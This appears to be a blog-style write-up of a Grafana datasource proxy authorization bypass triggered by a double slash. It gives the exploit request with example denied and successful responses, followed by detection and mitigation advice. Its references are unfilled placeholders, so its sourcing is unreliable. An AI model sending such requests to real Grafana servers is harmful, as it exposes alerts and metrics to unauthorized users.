CVE-2025-3454 - Bypassing Grafana Datasource Proxy API Authentication with a Simple Slash

Grafana is an open-source analytics and monitoring platform, used widely for visualizing data through dashboards. In early 2025, a critical security flaw was discovered in its datasource proxy API—which is heavily used for integrating with services like Alertmanager and Prometheus.

This article explains the vulnerability, gives example attack payloads, and helps you understand how attackers can use a single extra slash in the URL to gain unauthorized access.

What is CVE-2025-3454?

CVE-2025-3454 is a path traversal style vulnerability that allows users with very limited permissions on a Grafana instance to bypass authorization checks on the datasource proxy API. By inserting an extra “slash” in certain URL paths, attackers are granted access to otherwise protected data—specifically from the Alertmanager and Prometheus datasources.

Attack Vector: HTTP request to datasource proxy endpoint with a double slash in the path

- Impact: Bypass of route-specific authorization checks, resulting in read access to sensitive monitoring data

How Does the Bug Work?

Normally, Grafana enforces route-specific permissions. For example, a user with “viewer” permissions shouldn’t be able to read specific metrics or alerts from Prometheus or Alertmanager datasources.

But the API behind /api/datasources/proxy/{id}/... doesn’t normalize the path correctly. If you add an extra slash, like /api/datasources/proxy/2//api/v1/alerts, Grafana fails to detect this as a protected route and skips authorization checks. As a result, users who shouldn’t have access can now read internal monitoring data.

Exploit Example

Let’s say you’re an attacker with a legitimate “viewer” account and minimal access. You want to grab all active alerts from an Alertmanager datasource with ID 2.

Normal Access Attempt (Expected Denied)

GET /api/datasources/proxy/2/api/v1/alerts
Authorization: Bearer <low-permission-token>

Response

HTTP/1.1 403 Forbidden
{
    "message": "You don't have access to this resource"
}

Bypassing Authorization with a Double Slash

GET /api/datasources/proxy/2//api/v1/alerts
Authorization: Bearer <low-permission-token>

Response

HTTP/1.1 200 OK
[
  {
    "labels": { ... },
    "annotations": { ... },
    "state": "active"
  },
  ...
]

Explanation:
By inserting the extra / after the proxy ID, Grafana's API skips the intended auth logic, and passes the call through to Alertmanager, leaking information.

Affected Configurations

This bug affects all Grafana versions prior to the official fix (see [References](#references))—especially if you use:

Alertmanager integrations

It primarily impacts GET (read-only) endpoints, but could expose critical monitoring or alerting information.

Upgrade Grafana:

Patch your deployment immediately once the fix is released. See the [official advisory](#references).

Check Logs for Exploitation Attempts:

Search for double slashes (//) in your Grafana API logs, especially under /api/datasources/proxy/.

Apply Workarounds:

If you can’t upgrade right away, consider web server-level filters that block double slashes in sensitive paths.

Cloud Security:

Attackers gaining access to your Alertmanager endpoints might see all live and past alerts, exposing details about your cloud infrastructure, incidents, credentials in alert annotations, or even hints about ongoing attacks.

Internal Threats:

Low-privileged users or contractors misusing their dashboards can siphon off metrics they’re not supposed to see by crafting simple requests.

Official Security Advisory:

Grafana Security Blog on CVE-2025-3454 *(link placeholder, update with official link when available)*

GitHub Issue & Patch Diff:

Grafana GitHub Repository *(replace #### with the actual pull request number)*

Mitre CVE Details:

NIST NVD entry for CVE-2025-3454 *(update on disclosure)*

Key Takeaways

- A single extra slash in the URL can open sensitive metrics and alert data to users with bare-minimum permissions.

Stay safe, and audit your APIs!

*This is an exclusive explanation based on the current knowledge of CVE-2025-3454. Please check the official Grafana advisories for real-time updates.*

Timeline

Published on: 06/02/2025 11:15:22 UTC
Last modified on: 06/02/2025 17:32:17 UTC